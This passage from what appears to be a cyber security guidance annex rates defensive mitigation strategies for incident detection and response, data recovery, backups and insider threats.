  10. Very good – Outbound web and email data loss prevention. Block unapproved cloud computing services. Log recipient, size and frequency of outbound emails. Block and log emails with sensitive words or data patterns.

Annex A Table 3 Strategies to Mitigate Cyber Incidents – Mitigation strategies to detect cyber security incidents and respond

Each entry gives the relative security effectiveness rating, followed by the mitigation strategy.

  1. Excellent – Continuous incident detection and response with automated immediate analysis of centralised time-synchronised logs of permitted and denied: computer events, authentication, file access and network activity.
  2. Very good – Host-based intrusion detection and prevention system to identify anomalous behaviour during program execution (eg process injection, keystroke logging, driver loading and persistence).
  3. Very good – Endpoint detection and response software on all computers to centrally log system behaviour and facilitate incident response. Microsoft's free Sysmon tool is an entry-level option.
  4. Very good – Hunt to discover incidents based on knowledge of adversary tradecraft. Leverage threat intelligence consisting of analysed threat data with context enabling mitigating action, not just indicators of compromise.
  5. Limited – Network-based intrusion detection and prevention system using signatures and heuristics to identify anomalous traffic both internally and crossing network perimeter boundaries.
  6. Limited – Capture network traffic to and from corporate computers storing important data or considered as critical assets, and network traffic traversing the network perimeter, to perform incident detection and analysis.

Annex A Table 4 Strategies to Mitigate Cyber Incidents – Mitigation strategies to recover data and system availability

Each entry gives the relative security effectiveness rating, followed by the mitigation strategy.

  1. Excellent – Daily backups of important new or changed data, software and configuration settings, stored disconnected, retained for at least three months. Test restoration initially, annually and when IT infrastructure changes.
  2. Very good – Business continuity and disaster recovery plans which are tested, documented and printed in hardcopy with a softcopy stored offline. Focus on the highest priority systems and data to recover.
  3. Very good – System recovery capabilities eg virtualisation with snapshot backups, remotely installing operating systems and applications on computers, approved enterprise mobility, and onsite vendor support contracts.

Annex A Table 5 Strategies to Mitigate Cyber Incidents – Mitigation strategy specific to preventing malicious insiders

Each entry gives the relative security effectiveness rating, followed by the mitigation strategy.

  1. Very good – Personnel management eg ongoing vetting especially for users with privileged access, immediately disable all accounts of departing users, and remind users of their security obligations and penalties.